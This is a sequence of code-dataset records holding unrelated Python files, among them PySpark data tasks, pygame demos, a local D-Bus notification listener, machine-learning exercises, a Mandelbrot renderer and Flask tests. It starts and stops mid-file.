How do table booking and online delivery increase or decrease food ordering?\n\ndef task7():\n    task7= Restaurant.join(Foods, \"Country_Code\", \"inner\").select(\"Cuisine\", \"Has_Table_booking\",\"Has_Online_delivery\")\n#task7.show()\n\n    task71= task7.filter(task7.Has_Table_booking == \"Yes\").groupBy(\"Has_Table_booking\").count()\n    task72= task7.filter(task7.Has_Table_booking == \"No\").groupBy(\"Has_Table_booking\").count()\n    task73= task7.filter(task7.Has_Online_delivery == \"Yes\").groupBy(\"Has_Online_delivery\").count()\n    task74= task7.filter(task7.Has_Online_delivery == \"No\").groupBy(\"Has_Online_delivery\").count()\n\n    task99= task71.union(task72)\n    task999=task73.union(task74)\n    task999=task999.select(\"Has_Online_delivery\",\"count\").withColumnRenamed(\"count\",\"Counts\")\n\n    task75=task99.join(task999)\n\n    #task75=task71.join(task73)\n    #task76= task73.join(task74)\n\n    return task75\n    \n#task71= task7.filter(task7.Has_Table_booking == \"Yes\").groupBy(\"Has_Table_booking\",\"Cuisine\").count().show(50,truncate=False)\n#task72= task7.filter(task7.Has_Table_booking == \"No\").groupBy(\"Has_Table_booking\",\"Cuisine\").count().show(50,truncate=False)\n\n\n#task73= task7.filter(task7.Has_Online_delivery == \"Yes\").groupBy(\"Has_Online_delivery\",\"Cuisine\").count().show(50,truncate=False)\n#task74= task7.filter(task7.Has_Online_delivery == \"No\").groupBy(\"Has_Online_delivery\",\"Cuisine\").count().show(50,truncate=False)\n\n\n\n# # 8. Which is more popular: table booking or online delivery?\n\ndef task8():\n    task8= Restaurant.select(\"Has_Table_booking\",\"Has_Online_delivery\")\n\n\n    task81= task8.filter(task8.Has_Table_booking == \"Yes\").groupBy(\"Has_Table_booking\").count()\n\n    task82= task8.filter(task8.Has_Online_delivery == \"Yes\").groupBy(\"Has_Online_delivery\").count()\n    task82=task82.select(\"Has_Online_delivery\",\"count\").withColumnRenamed(\"count\",\"Counts\")\n    task83=task81.join(task82)\n    return task83\n# # 9. Display cuisines having price range below 2 and food rating above 4.5?\n\ndef task9():\n    task9= Foods.join(Cost, \"Country_Code\").select(\"Cuisine\",\"Price_range\",\"Rating\")\n\n\n    task92= task9.select(\"Rating\",\"Price_range\",explode(task9.Cuisine)).withColumnRenamed(\"col\",\"Cuisine\")\n\n    task93= task92.filter((task92.Price_range<2)& (task92.Rating>4.5)) \n    return task93\n\n\n# # 10. Count restaurants having neither table booking nor online delivery but excellent ratings.\n\ndef task10():\n    task10= Restaurant.join(Foods, \"Country_Code\")\n#task10.show(2)\n\n    task11= task10.filter((task10.Has_Table_booking == \"No\") & (task10.Has_Online_delivery == \"No\") & (task10.Rating_text == \"Excellent\"))\n    task12=task11.select(count(\"Restaurant_Name\"))\n    return task12\n\n\n# 12. Food rating and cost per person of countries having per capita income below 5000 \n\ndef task12():\n    task11= Foods.join(Cost_new,\"Country_Code\").join(Country, \"Country_Code\")\n    task11=task11.withColumnRenamed('Per_Capita_Income(USD)', \"PCI\")\n    task111= task11.select(\"Rating\", \"Cost_USD\",'PCI').filter(task11.PCI<5000).distinct()\n    print(task111.show())\n    return task111\n\n# 13. 
Which location/city in a country is most profitable (has the most orders)?\n\ndef task13():\n    task13= Restaurant.join(Country, \"Country_Code\")\n    task131= task13.filter(task13.Country==\"India\")\n    task132= task131.groupBy(\"Restaurant_Name\",\"City\").count().sort(col(\"count\").desc())\n    task134= task131.filter(task131.Restaurant_Name == \"Cafe Coffee Day\").groupBy(\"City\").count()\n    print(task134.show())\n\n    return(task134)\n\n # 14. Restaurants having the most branches.\n\ndef task14():\n    task14= Restaurant.select(\"Restaurant_Name\",\"City\").distinct()\n    task141= task14.groupBy(\"Restaurant_Name\").count().sort(col(\"count\").desc())\n    print(task141.show())\n\n    return(task141)\n\n\n\n\n\n\n","repo_name":"dpka09/Pipeline","sub_path":"dags/transformation.py","file_name":"transformation.py","file_ext":"py","file_size_in_byte":8978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74749635729","text":"import time\n\nimport pygame_menu\n\nfrom react import GameEngine\n\n\ndef reset_menu_selection(menu):\n    menu.select_widget(None)\n\n\ndef led_check(menu, game_engine: GameEngine, check_time: int):\n    \"\"\"Turn on all LEDs for check_time seconds\"\"\"\n    print(\"Start led_check\")\n\n    start = time.time()\n    elapsed = lambda: time.time() - start\n\n    game_engine.lights.on()\n    while elapsed() <= check_time:\n        time.sleep(1)\n\n    game_engine.lights.off()\n    reset_menu_selection(menu)\n    print(\"Done led_check\")\n\n\ndef led_button_check(menu, game_engine: GameEngine):\n    \"\"\"Light up the buttons 1 by 1 to verify that they all work\"\"\"\n    print(\"Start led_button_check\")\n    game_engine.button_test()\n    print(\"Done led_button_check\")\n    reset_menu_selection(menu)\n\n\ndef init_settings_menu(on_close_cb, game_engine) -> \"pygame_menu.Menu\":\n    theme_menu = pygame_menu.themes.THEME_BLUE.copy()\n    theme_menu.scrollbar_cursor = pygame_menu.locals.CURSOR_HAND\n\n    # Main menu, pauses execution of the application\n    menu = pygame_menu.Menu(\n        height=400, onclose=on_close_cb, theme=theme_menu, title=\"Main Menu\", width=600\n    )\n\n    cheat_sub_menu = pygame_menu.Menu(\n        height=400, onclose=on_close_cb, theme=theme_menu, title=\"Cheat Menu\", width=600\n    )\n\n    # Led check\n    led_check_time = 30  # sec\n    menu.add.button(\n        f\"Led check ({led_check_time} sec)\",\n        led_check,\n        menu,\n        game_engine,\n        led_check_time,\n    )\n\n    menu.add.button(\n        f\"Led & Button check\",\n        led_button_check,\n        menu,\n        game_engine,\n    )\n\n    menu.add.button(\"Cheat Menu\", cheat_sub_menu)\n\n    cheat_sub_menu.add.button(\"What were you expecting?!\")\n\n    menu.add.button(\"Exit Game\", pygame_menu.events.EXIT)\n    return menu\n","repo_name":"bagerard/Whack-A-Pi","sub_path":"settings_menu.py","file_name":"settings_menu.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16279919409","text":"# works, needs eavesdrop='true'\n\nfrom gi.repository import Gtk\nimport dbus\nfrom dbus.mainloop.glib import DBusGMainLoop\n \ndef msg_filter(_bus, msg):\n    if msg.get_member() != \"Notify\":\n        return\n    args = msg.get_args_list()\n    print(\"%s:%s\" % (args[3], args[4]))\n \nif __name__ == '__main__':\n    DBusGMainLoop(set_as_default = True)\n    bus = dbus.SessionBus()\n    bus.add_match_string(\"interface='org.freedesktop.Notifications',eavesdrop='true'\")\n    bus.add_message_filter(msg_filter)\n    
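# hand control to the GTK main loop so the message filter keeps receiving notifications\n    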
Gtk.main()","repo_name":"hevi9/etc-python","sub_path":"dbus/grab_notify4.py","file_name":"grab_notify4.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"26510904013","text":"# https://github.com/CUAI/Non-Homophily-Benchmarks/blob/main/models.py\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch_geometric.nn import GCNConv, JumpingKnowledge\n# from torch_geometric.nn.conv.gcn_conv import gcn_norm\n# import scipy.sparse\n# import numpy as np\n\nclass GCNJK(nn.Module):\n def __init__(self, \n edge_index,\n norm_A,\n in_channels, \n hidden_channels, \n out_channels, \n num_layers=2,\n dropout=0.5, \n jk_type='max'\n ):\n super(GCNJK, self).__init__()\n self.norm_A = norm_A\n self.edge_index = edge_index\n\n self.convs = nn.ModuleList()\n self.convs.append(\n GCNConv(in_channels, hidden_channels, cached=False, normalize=False))\n\n self.bns = nn.ModuleList()\n self.bns.append(nn.BatchNorm1d(hidden_channels))\n for _ in range(num_layers - 2):\n self.convs.append(\n GCNConv(hidden_channels, hidden_channels, cached=False, normalize=False))\n self.bns.append(nn.BatchNorm1d(hidden_channels))\n\n self.convs.append(\n GCNConv(hidden_channels, hidden_channels, cached=False, normalize=False))\n\n self.dropout = dropout\n self.activation = F.relu\n self.jump = JumpingKnowledge(jk_type, channels=hidden_channels, num_layers=1)\n if jk_type == 'cat':\n self.final_project = nn.Linear(hidden_channels * num_layers, out_channels)\n else: # max or lstm\n self.final_project = nn.Linear(hidden_channels, out_channels)\n\n\n def reset_parameters(self):\n for conv in self.convs:\n conv.reset_parameters()\n for bn in self.bns:\n bn.reset_parameters()\n self.jump.reset_parameters()\n self.final_project.reset_parameters()\n\n def predict(self, x):\n with torch.no_grad():\n self.eval()\n xs = []\n for i, conv in enumerate(self.convs[:-1]):\n x = conv(x, self.edge_index, edge_weight=self.norm_A)\n x = self.bns[i](x)\n x = self.activation(x)\n xs.append(x)\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = self.convs[-1](x, self.edge_index, edge_weight=self.norm_A)\n xs.append(x)\n x = self.jump(xs)\n x = self.final_project(x)\n return x\n\n def forward(self, x):\n xs = []\n for i, conv in enumerate(self.convs[:-1]):\n x = conv(x, self.edge_index, edge_weight=self.norm_A)\n x = self.bns[i](x)\n x = self.activation(x)\n xs.append(x)\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = self.convs[-1](x, self.edge_index, edge_weight=self.norm_A)\n xs.append(x)\n x = self.jump(xs)\n x = self.final_project(x)\n x = F.log_softmax(x, dim=1)\n return x","repo_name":"yuziGuo/ClenshawGNN","sub_path":"models/GCNJK.py","file_name":"GCNJK.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"878967255","text":"# coding=utf-8\n\"\"\"\"\nAuthors:\n Bruno Beljo\n Antonio Boban\n Anton Ilic\n\nDescription:\n Computing of Mandelbrot set using serial computing\n\nData types:\n width = int Image width\n height = int Image height\n x1 = float minimum X-Axis value\n x2 = float maximum X-Axis value\n y1 = float minimum Y-Axis value\n y2 = float maximum Y-Axis value\n maxit = int maximum interation\n\nTest values:\n width, height = 500, 250\n x1, x2 = -2.0, 1.0\n y1, y2 = -1.0, 1.0\n maxit = 141\n\nRunning instruction:\n Code runs in Linux terminal\n Structure:\n python3 
mandelbrot_s.py width height x1 x2 y1 y2 maxit change_color\n    Example:\n        python3 mandelbrot_s.py 1024 1024 -0.74877 -0.74872 0.065053 0.065103 2048 3\n\"\"\"\nfrom functions import *\nimport time\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport os\nimport sys\n\n\"\"\"Makes using the -h parameter possible by ignoring other arguments.\nIf there are more arguments, their values are used in the computation.\n\"\"\"\nif len(sys.argv) == 2:\n    help_menu()\nelse:\n    width = int(sys.argv[1]) #Image width\n    height = int(sys.argv[2]) #Image height\n    x1 = float(sys.argv[3]) #x axis minimum\n    x2 = float(sys.argv[4]) #x axis maximum\n    y1 = float(sys.argv[5]) #y axis minimum\n    y2 = float(sys.argv[6]) #y axis maximum\n    maxit = int(sys.argv[7]) #maximum number of iterations\n    c = int(sys.argv[8]) #color mode\n\n#Printing the arguments the code was run with\nprint(\"Parameters:\")\nprint(\"\\tOutput: \", os.path.relpath('mandelbrot_serial.png', start=\"./file.txt\"))\nprint(\"\\tImage width: \", width)\nprint(\"\\tImage height:\", height)\nprint(\"\\tX-Axis minimum:\", x1)\nprint(\"\\tX-Axis maximum:\", x2)\nprint(\"\\tY-Axis minimum: \", y1)\nprint(\"\\tY-Axis maximum: \", y2)\nprint(\"\\tIterations: \", maxit)\n\n#Calculating execution time\nstart = time.time()\nprint(\"Computing...\")\n\nC = np.zeros([height, width], dtype='i')\ndx = (x2-x1)/width\ndy = (y2-y1)/height\n\nfor i in range(height):\n    y = y1 + i * dy\n    for j in range(width):\n        x = x1 + j * dx\n        C[i,j] = mandelbrot(x, y, maxit)\n\n# Time calculation result\nend = time.time()\nprint(\"Computing finished in \", end - start, \"seconds.\")\n\n#Graphing\nprint(\"Building image...\")\nplt.imshow(change_colors(c,C), aspect='equal', cmap=plt.cm.gnuplot2, interpolation='bilinear', extent=(x1, x2, y1, y2))\nplt.title('Mandelbrot set using serial computing')\nplt.xlabel('Real')\nplt.ylabel('Imaginary')\n\nplt.savefig('mandelbrot_serial.png', dpi=1000)\nplt.show()\n\n#Relative path\npath = os.path.relpath('mandelbrot_serial.png', start=\"./file.txt\")\nprint(\"Image save path: \", path)","repo_name":"ailic96/mandelbrot","sub_path":"mandelbrot_s.py","file_name":"mandelbrot_s.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21629538480","text":"\"\"\"\r\nCase 1: detecting anomalous servers\r\nDataset: data/ex8data1.mat\r\nNote: the algorithm is implemented by hand\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport scipy.io as sio\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef estimate_gaussian(X, isCovariance):  # compute the means and the covariance matrix\r\n    means = np.mean(X, axis=0)\r\n    if isCovariance:\r\n        sigma2 = (X - means).T @ (X - means) / len(X)  # diagonal entries are variances, the rest are covariances; sigma=np.cov(X.T) works too\r\n    else:\r\n        sigma2 = np.var(X, axis=0)  # np.var computes the variance\r\n    return means, sigma2\r\n\r\n\r\ndef gaussian_distribution(X, means, sigma2):\r\n    if np.ndim(sigma2) == 1:  # 1-D sigma2 is the original Gaussian model; convert it to a diagonal matrix\r\n        sigma2 = np.diag(sigma2)\r\n\r\n    X = X - means\r\n    n = X.shape[1]\r\n\r\n    first = np.power(2 * np.pi, -n / 2) * (np.linalg.det(sigma2) ** (-0.5))\r\n    second = np.diag(X @ np.linalg.inv(sigma2) @ X.T)\r\n    p = first * np.exp(-0.5 * second)\r\n    p = p.reshape(-1, 1)  # reshape to (n,1)\r\n\r\n    return p\r\n\r\n\r\ndef plotGaussian(X, means, sigma2):\r\n    plt.figure()\r\n    x = np.arange(0, 30, 0.5)\r\n    y = np.arange(0, 30, 0.5)\r\n    xx, yy = np.meshgrid(x, y)\r\n    z = gaussian_distribution(np.c_[xx.ravel(), yy.ravel()], means, sigma2)  # evaluate the Gaussian density on the grid\r\n    zz = z.reshape(xx.shape)\r\n    plt.plot(X[:, 0], X[:, 1], 'bx')\r\n    contour_levels = [10 ** h for h in range(-20, 0, 3)]\r\n    plt.contour(xx, yy, zz, contour_levels)\r\n\r\n\r\ndef select_threshold(yval, p):\r\n    bestEpsilon = 0\r\n    bestF1 = 0\r\n    epsilons = np.linspace(min(p), max(p), 1000)\r\n    for e in epsilons:\r\n        p_ = p < e\r\n        tp = np.sum((yval == 1) & (p_ == 1))\r\n        fp = np.sum((yval == 0) & (p_ == 1))\r\n        fn = np.sum((yval == 1) & (p_ == 0))\r\n        prec = tp / (tp + fp) if (tp + fp) else 0  # precision\r\n        rec = tp / (tp + fn) if (tp + fn) else 0  # recall\r\n        F1_e = 2 * prec * rec / (prec + rec) if (prec + rec) else 0  # F1 score\r\n        if F1_e > bestF1:\r\n            bestF1 = F1_e\r\n            bestEpsilon = e\r\n    return bestEpsilon, bestF1\r\n\r\n\r\nif __name__ == '__main__':\r\n    mat = sio.loadmat('data/ex8data1.mat')  # dict_keys(['__header__', '__version__', '__globals__', 'X', 'Xval', 'yval'])\r\n    X = mat.get('X')  # X-->(307,2)\r\n    X_val, y_val= mat['Xval'], mat['yval']\r\n    # original Gaussian model\r\n    means, sigma2 = estimate_gaussian(X, isCovariance=False)\r\n    plotGaussian(X, means, sigma2)\r\n\r\n    # multivariate Gaussian model\r\n    means, sigma2 = estimate_gaussian(X, isCovariance=True)\r\n    plotGaussian(X, means, sigma2)\r\n    # select the threshold ε using the cross-validation set\r\n    p_val = gaussian_distribution(X_val, means, sigma2)\r\n    bestEpsilon, bestF1 = select_threshold(y_val, p_val)\r\n    print(bestEpsilon, bestF1)\r\n\r\n    p = gaussian_distribution(X, means, sigma2)\r\n    anoms = np.array([X[i] for i in range(X.shape[0]) if p[i] < bestEpsilon])\r\n    print(len(anoms))\r\n    print('sss',anoms)\r\n    plotGaussian(X, means, sigma2)\r\n    plt.scatter(anoms[:, 0], anoms[:, 1], c='r', marker='o')\r\n\r\n    # plt.plot(X[:, 0], X[:, 1], 'bx')\r\n    plt.show()\r\n\r\n\r\n# ------------- Case 2: anomaly detection on high-dimensional data, dataset: data/ex8data2.mat -------------------\r\n    mat_h = sio.loadmat('data/ex8data2.mat')  # dict_keys(['__header__', '__version__', '__globals__', 'X', 'Xval', 'yval'])\r\n    X2 = mat_h['X']\r\n    X_val2, y_val2 = mat_h['Xval'], mat_h['yval']\r\n    print(X2.shape,X_val2.shape,y_val2.shape)\r\n    means_h,sigma2_h = estimate_gaussian(X2, isCovariance=True)\r\n    pval = gaussian_distribution(X_val2, means_h, sigma2_h)\r\n    bestEpsilon_h, bestF1_h = select_threshold(y_val2, pval)\r\n    p_h = gaussian_distribution(X2,means_h,sigma2_h)\r\n    anoms_h = np.array([X2[i] for i in range(X2.shape[0]) if p_h[i] < bestEpsilon_h])\r\n    print(len(anoms_h))\r\n","repo_name":"giser-z/Coursera-ML-AndrewNg-Exercises","sub_path":"ex8-anomaly detection and recommendation/01-异常检测.py","file_name":"01-异常检测.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5586421590","text":"\nimport torch\nfrom torch import nn\nimport torchvision\nfrom torch import optim\nfrom torch.nn import functional as F\n\nfrom matplotlib import pyplot as plt\nfrom utils import plot_image, plot_curve, one_hot\n\nbatch_size = 512\nlr=0.1\ntrain_loader = torch.utils.data.DataLoader(\n    torchvision.datasets.MNIST('mnist_data',train=True,download=True,\n                               transform=torchvision.transforms.Compose([\n                                   torchvision.transforms.ToTensor(),\n                                   torchvision.transforms.Normalize(\n                                       (0.1307,), (0.3081,))\n                               ])),\n    batch_size = batch_size, shuffle=True)\n\ntest_loader = torch.utils.data.DataLoader(\n    torchvision.datasets.MNIST('mnist_data',train=False,download=True,\n                               transform=torchvision.transforms.Compose([\n                                   torchvision.transforms.ToTensor(),\n                                   torchvision.transforms.Normalize(\n                                       (0.1307,),(0.3081,))\n                               ])),\n    batch_size = batch_size,shuffle=False)\n\n# x, y = next(iter(train_loader))\n# print(x.shape, y.shape, x.min(), x.max())\n# plot_image(x, y, 'image_MNIST')\n\nclass Net(nn.Module):\n\n    def __init__(self):\n        
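# a small fully connected classifier: 784 -> 256 -> 128 -> 64 -> 10\n        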
super(Net, self).__init__()\n        #[b, 1, 28, 28]\n        #h1=w1*x+b1\n        self.fc1 = nn.Linear(28*28,256)\n        self.fc2 = nn.Linear(256, 128)\n        #h2=w2*h1+b2\n        self.fc3 = nn.Linear(128,64)\n        #h3=w3*h2+b3\n        self.fc4 = nn.Linear(64,10)\n\n    def forward(self, x):\n        # [b, 1, 28, 28]\n        x=F.relu(self.fc1(x))\n        x=F.relu(self.fc2(x))\n        x=F.relu(self.fc3(x))\n        x=self.fc4(x)\n\n        return x\n\nnet = Net()\noptimizer = optim.SGD(net.parameters(), lr=lr, momentum=0.9)\ntrain_loss = []\nfor epoch in range(3):\n    for batch_idx, (x, y) in enumerate(train_loader):\n        # print(x.shape, y.shape)\n        # break\n        #x:[b, 1, 28, 28] y:[512]\n        #x:[b, 1, 28, 28]=>[b,28*28]\n        x = x.view(x.size(0),-1)\n        #x: [b,10]\n        x = net(x)\n        #y =>[b,10] one hot\n        y_onehot = one_hot(y)\n        loss = F.mse_loss(x, y_onehot)\n\n        optimizer.zero_grad()\n        loss.backward()\n        optimizer.step()\n        train_loss.append(loss.item())\n        if batch_idx % 10 == 0:\n            print(epoch, batch_idx, loss.item())\n\n\nplot_curve(train_loss)\n\ncorrect_num = 0\nfor x,y in test_loader:\n    #[b, 1, 28, 28]\n    x = x.view(x.size(0),-1)\n    #[b,10]\n    out = net(x)\n    pred=out.argmax(dim=1)\n    correct_num += pred.eq(y).sum().float().item()\nprint('x:', x.shape, 'out:', out.shape, 'pred:',pred.shape, 'y:', y.shape)\ntotal_num = len(test_loader.dataset)\nacc = correct_num / total_num\nprint('acc:', acc, 'lr:',lr,'loss:',loss.item())\n\nx, y = next(iter(test_loader))\nout = net(x.view(x.size(0),-1))\npred = out.argmax(dim=1)\nplot_image(x, pred, 'test')\n","repo_name":"DowsWang/MNIST","sub_path":"main_nn.py","file_name":"main_nn.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40278789383","text":"\"\"\"\nURL: http://www.pythonchallenge.com/pc/def/map.html\n\n\"\"\"\n\n\nclue = \"\"\"\ng fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc dmp.\nbmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq rcvr gq qm jmle.\nsqgle qrpgle.kyicrpylq() gq pcamkkclbcb. 
lmu ynnjw ml rfc spj.\n\"\"\".replace('\\n', ' ').strip()\n\n\ndef maketrans(secret):\n    literals = set([' ', ')', '(', '.', \"'\"])\n    out = []\n    for i in secret:\n        if i in literals:\n            out.append(i)\n        else:\n            ni = ord(i) + 2\n            if ni > 122:\n                di = ni - 122 - 1\n                ni = 97 + di\n            out.append(chr(ni))\n    return ''.join(out)\n\n\nprint(maketrans(clue))\nprint(maketrans('map'))\n","repo_name":"cr8ivecodesmith/sharp_saw","sub_path":"pychallenge/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42326151003","text":"from __future__ import division\nk= \"nama saya\"\nl=\"heruzaman\"\n\n# print\nprint(\"OK\")\nprint(k,end=\" \")\n\n#Reading from keyboard\nx=input(\"something:\")\nprint(x)\n\n# raise exception\n# raise IOError(\"File error\")\n\n# argument in exception\n# except Myerror as err:\n\n# next() function\ngen=(letter for letter in 'HELOWORLD')\nnext(gen)\n\ndef area(x,y=3.14): #Fo\n    return \"ok\"\n\nprint(area(1,1))\n\n","repo_name":"syamsofa/belajarpython","sub_path":"basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36691410618","text":"from choice_file import choice_number_file\n\n\ndef change_row():\n    nf = choice_number_file()\n    with open(f\"db/data_{nf}.txt\", \"r\", encoding=\"utf-8\") as file:\n        data = file.readlines()\n    count_rows = len(data)\n    if count_rows == 0:\n        print(\"File is empty!\")\n    else:\n        number_row = int(input(f\"Enter the row number \" f\"from 1 to {count_rows}: \"))\n        while number_row < 1 or number_row > count_rows:\n            number_row = int(\n                input(f\"Error!\" f\"Enter the row number \" f\"from 1 to {count_rows}: \")\n            )\n        name = input(\"Enter your name: \")\n        surname = input(\"Enter your surname: \")\n        date_of_birth = input(\"Enter date of birth: \")\n        location = input(\"Enter your location: \")\n        data[number_row - 1] = f'{number_row};{name};{surname};{date_of_birth};{location}\\n'\n        with open(f\"db/data_{nf}.txt\", \"w\", encoding=\"utf-8\") as file:\n            file.writelines(data)\n        print('line updated successfully')","repo_name":"Aberezhnoy1980/python_practice","sub_path":"seminar008/change_data.py","file_name":"change_data.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26708955121","text":"import pytest\nfrom server import app\n\n\n@pytest.fixture\ndef client():\n    app.config['TESTING'] = True\n    client = app.test_client()\n    yield client\n\n\n@pytest.fixture\ndef club_fixture():\n    data = {\n        \"name\": \"Iron Temple\",\n        \"email\": \"admin@irontemple.com\",\n        \"points\": \"4\"\n    }\n    return data\n\n\ndef test_login_then_purchase_places(client, club_fixture):\n    result = client.post('/showSummary', data=club_fixture)\n    expected = \"Welcome, \" + str(club_fixture[\"email\"])\n    data_1 = {'competition': 'Test Event', 'club': club_fixture[\"name\"], 'places': 2}\n    asking = client.post('/purchasePlaces', data=data_1)\n    total_points = int(club_fixture[\"points\"]) - int(data_1[\"places\"])\n    response = 'Points available: ' + str(total_points)\n    assert expected.encode() in result.data\n    assert b'Great-booking complete!' 
in asking.data\n    assert response.encode() in asking.data\n\n\ndef test_ended_competition_then_logout(client, club_fixture):\n    competition = 'Fall Classic'\n    result = client.get('/book/'+str(competition)+'/'+str(club_fixture[\"name\"]))\n    assert b'COMPETITION OVER' in result.data\n    logout = client.get('/logout')\n    assert logout.status_code == 302\n\n\ndef test_purchase_then_check_points_display(client, club_fixture):\n    data_1 = {'competition': 'Test Event', 'club': club_fixture['name'], 'places': 2}\n    client.post('/purchasePlaces', data=data_1)\n    new_points = str(int(club_fixture[\"points\"]) - int(data_1[\"places\"]))\n    result = client.get('/points')\n    assert new_points.encode() in result.data\n\n\ndef test_try_more_than_12_then_get_full_points(client, club_fixture):\n    data = {'competition': 'Test Event', 'club': club_fixture[\"name\"], 'places': 13}\n    result = client.post('/purchasePlaces', data=data)\n    assert b'PAS PLUS DE 12 PLACES PAR CLUB' in result.data\n    display = client.get('/points')\n    expected_points = str(club_fixture['points'])\n    assert expected_points.encode() in display.data","repo_name":"akfio/OCProjet-11","sub_path":"test/test_integrations/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16717870175","text":"# pygame.mask module\n# https://www.pygame.org/docs/ref/mask.html\n#\n# Get the average Color of a Surface ignoring transparent pixels\n# https://stackoverflow.com/questions/69876220/get-the-average-color-of-a-surface-ignoring-transparent-pixels/70056421#70056421\n#\n# GitHub - Mask - Mask count pixel\n# https://github.com/Rabbid76/PyGameExamplesAndAnswers/blob/master/documentation/pygame/pygame_mask.md\n\nimport pygame\n\ndef get_average_color(surf):\n    color = pygame.transform.average_color(surf, surf.get_rect())\n    pixel_count = pygame.mask.from_surface(surf).count()\n    scale = surf.get_width() * surf.get_height() / pixel_count\n    print(color, scale, pixel_count)\n    return (round(color[0]*scale), round(color[1]*scale), round(color[2]*scale))\n\npygame.init()\nwindow = pygame.display.set_mode((400, 400))\nclock = pygame.time.Clock()\nfont = pygame.font.SysFont(None, 70)\n\ntest_surface = pygame.Surface((300, 300))\ntest_surface.set_colorkey((0, 0, 0))\npygame.draw.rect(test_surface, (255, 0, 0), (50, 50, 100, 100))\npygame.draw.rect(test_surface, (0, 255, 0), (150, 50, 100, 100))\npygame.draw.rect(test_surface, (255, 255, 0), (50, 150, 100, 100))\npygame.draw.rect(test_surface, (0, 0, 255), (150, 150, 100, 100))\n\navg_color = get_average_color(test_surface)\ncolor_text = font.render(f\"{avg_color[0]} {avg_color[1]} {avg_color[2]}\", True, \"black\")\n\nbackground = pygame.Surface(window.get_size())\nts, w, h, c1, c2 = 80, *window.get_size(), (160, 160, 160), (96, 96, 96)\ntiles = [((x*ts, y*ts, ts, ts), c1 if (x+y) % 2 == 0 else c2) for x in range((w+ts-1)//ts) for y in range((h+ts-1)//ts)]\n[pygame.draw.rect(background, color, rect) for rect, color in tiles]\n\nrun = True\nwhile run:\n    clock.tick(100)\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            run = False \n\n    window.blit(background, (0, 0))\n    rect = test_surface.get_rect(center = window.get_rect().center)\n    window.blit(test_surface, rect)\n    pygame.draw.rect(window, \"black\", rect, 5, 5)\n    window.blit(color_text, color_text.get_rect(center = rect.center))\n    
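# present the finished frame\n    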
pygame.display.flip()\n\npygame.quit()\nexit()","repo_name":"Rabbid76/PyGameExamplesAndAnswers","sub_path":"examples/minimal_examples/pygame_minimal_mask_count_pixel_1.py","file_name":"pygame_minimal_mask_count_pixel_1.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"66"} +{"seq_id":"39528908698","text":"import json\n\n# listens for the client input\nclient_id = input(\"Enter your client_id: \")\nclient_secret = input(\"Enter your client_secret: \")\nuser_agent = 'rdt_client'\n\nsettings = {\n    'cache_size': 10,\n    'cache_location': 'cache/',\n    'default_sub': 'wallpapers',\n    \"subreddits\": [\"wallpapers\", \"earthporn\", \"cozyplaces\"]\n}\npraw_auth = {\n    'client_id': client_id.strip(),\n    'client_secret': client_secret.strip(),\n    'user_agent': user_agent\n}\n\n# generates master json\nconfig_json = {\n    \"settings\": settings,\n    \"praw_auth\": praw_auth\n}\n\n# writes to JSON\nwith open(\"config/config.json\", \"w\") as p:\n    json.dump(config_json, p, indent=4)\n","repo_name":"najeemk/RDTimg","sub_path":"generate_config.py","file_name":"generate_config.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73424589009","text":"'''\n- 0 : sheep\n- 1 : wolf\n\nDFS traversal\nonly 11 of 18 test cases pass\n'''\nresult=1\n\ndef dfs(info,graph,x,sheep,wolf,visited):\n    global result\n\n    if sheep<=wolf:\n        return None,None,None\n    visited[x]=1\n    print(\"x,sheep,wolf:\",x,sheep,wolf)\n\n    for i in graph[x]:\n        if not visited[i]:\n            print(\"i:\",i)\n            # met a sheep\n            if info[i]==0:\n                result+=1\n                print(\"result:\",result)\n                dfs(info,graph,i,sheep+1,wolf,visited)\n            # met a wolf\n            else:\n                dfs(info, graph, i, sheep,wolf+1, visited)\n    return result,wolf,visited\n\ndef solution(info, edges):\n    graph = [[] for _ in range(len(info))]\n    parent = [0]*len(info)\n    for a,b in edges:\n        graph[a].append(b)\n        graph[b].append(a)\n        parent[b]=a\n    visited = [0]*len(info)\n    visited[0]=1\n    sheep, wolf, visited = dfs(info,graph,0,1,0,visited)\n    for i in range(len(info)):\n        if not visited[i]:\n            